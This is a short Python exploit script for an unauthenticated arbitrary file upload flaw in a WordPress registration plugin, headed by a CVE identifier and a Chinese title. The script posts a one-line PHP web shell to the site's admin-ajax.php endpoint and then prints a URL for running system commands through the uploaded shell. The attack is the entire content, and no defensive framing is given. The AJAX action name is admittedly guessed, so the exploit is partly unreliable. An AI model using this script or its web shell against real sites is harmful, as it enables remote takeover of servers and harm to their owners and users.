CVE-2026-4882 WordPress插件任意文件上传漏洞

import requests # Exploit Title: User Registration Advanced Fields < 1.6.20 - Unauthenticated Arbitrary File Upload (RCE) # Date: 2026-05-02 # Vulnerable Endpoint: /wp-admin/admin-ajax.php target_url = "http://target-site.com/wp-admin/admin-ajax.php" # The action parameter usually maps to the AJAX function name or a registered hook # Based on the function name URAF_AJAX::method_upload, the action might be 'uraf_upload_file' or similar. payload_data = { 'action': 'uraf_upload_file', # Other required fields based on form structure might be needed } # Malicious PHP file to upload files = { 'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/octet-stream') } response = requests.post(target_url, data=payload_data, files=files) if response.status_code == 200: print("[+] File uploaded successfully!") # Check response for upload path or filename print("[+] Response:", response.text) print("[+] Access your shell at: http://target-site.com/wp-content/uploads/[year]/month/shell.php?cmd=whoami") else: print("[-] Upload failed.")